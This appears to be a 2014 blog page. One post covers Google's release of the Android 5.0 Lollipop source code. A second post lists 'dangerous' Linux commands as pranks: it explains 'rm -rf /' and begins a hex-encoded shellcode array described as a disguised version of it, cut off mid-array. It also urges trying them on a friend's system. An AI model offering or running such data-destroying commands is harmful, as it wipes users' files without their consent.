Skip to main content

Posts

Showing posts from November 7, 2014

Google Unveils Android Lollipop Source Code

Android 5 Source -Code Revealed Google has now officially completed the launch of the latest Android version by releasing the source code in Android Open Source Project (ASOP). The IT giant has unveiled all Android 5.0 code at its official Git webpage, ( Check here ), and source codes are now absolute ready for the manufacturers and custom ROM developers.   Android 5.0, Android 5.0 source code, Android 5.0 Lollipop, Google, Google Android 5.0 Lollipop release, Android, Android version release  Google has made the Android 5.0 code available as a part of android/platform build/lollipop-release branch with the build number of “LRX21M”. It has also added the device repositories for the new Nexus devices including Nexus Player, Nexus 6 and Nexus 9.  Along with that, the Android team has also shared a new documentation for Lollipop release, which would assist the developers about how to go with it. The Android Building Google Group post regarding the same can be viewed here .

Superb Linux Commands To do Fun With.

Dangerous Linux Commands To Play :) Don't ever Run These Commands on Your Linux Desktop...... Ahh  well you can Try on Your Friends Linux Destro :) 1. rm -rf / Deletes everything including files on your hard drive and files on connected removable media devices. rm – Remove the following files. -rf – Run rm recursively and force-remove all files without prompting you. / – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices,  including remote file shares and removable drives. 2. Disguised rm –rf / Actually, the hex version of rm –rf / – wipes out your files just as if you had run rm –rf /. char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\